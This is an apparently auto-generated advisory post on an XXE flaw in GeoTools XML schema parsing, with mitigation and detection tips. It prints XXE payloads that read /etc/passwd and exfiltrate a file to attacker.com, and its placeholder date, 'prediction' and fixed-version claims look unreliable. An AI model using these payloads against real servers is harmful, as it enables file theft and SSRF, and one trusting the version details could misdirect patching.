Listen to this Post
How the CVE Works
The vulnerability arises in GeoTools’ `gt-xsd-core` due to improper handling of XML schemas via the Eclipse XSD library. When parsing XML documents referencing external schemas, the `Schemas` class fails to enforce the configured EntityResolver, allowing XXE attacks. Attackers can craft malicious XML payloads embedding external entities (e.g., <!ENTITY xxe SYSTEM "file:///etc/passwd">), leading to SSRF or local file exfiltration. The `gt-wfs-ng` DataStore exacerbates this by ignoring the `ENTITY_RESOLVER` parameter, leaving WFS (Web Feature Service) endpoints exposed.
DailyCVE Form
Platform: GeoTools
Version: <23.x
Vulnerability: XXE
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch by Q3 2023
What Undercode Say:
Exploitation
1. Payload Example:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <featureType><name>&xxe;</name></featureType>
2. SSRF via HTTP:
<!ENTITY xxe SYSTEM "http://attacker.com/malicious.xsd">
3. OOB Exfiltration:
<!ENTITY % payload SYSTEM "file:///confidential.txt"> <!ENTITY % oob "<!ENTITY &x25; exfil SYSTEM 'http://attacker.com/?leak=%payload;'>">
Protection
1. Disable DTDs:
XMLParser.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
2. Enforce EntityResolver:
Schemas.parse(location, new NoOpEntityResolver()); // Blocks external entities
3. GeoTools Patch:
<dependency> <groupId>org.geotools</groupId> <artifactId>gt-xsd-core</artifactId> <version>23.0+</version> <!-- Fixed version --> </dependency>
Detection
1. Log Analysis:
grep -r "DOCTYPE" /var/log/geoserver/.log
2. Network Monitoring:
tcpdump -i eth0 'dst port 80 and src host <geotools_server>'
Mitigation
- WAF Rules:
location /wfs { if ($args ~ "DOCTYPE") { return 403; } } - Schema Validation:
SchemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
References
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
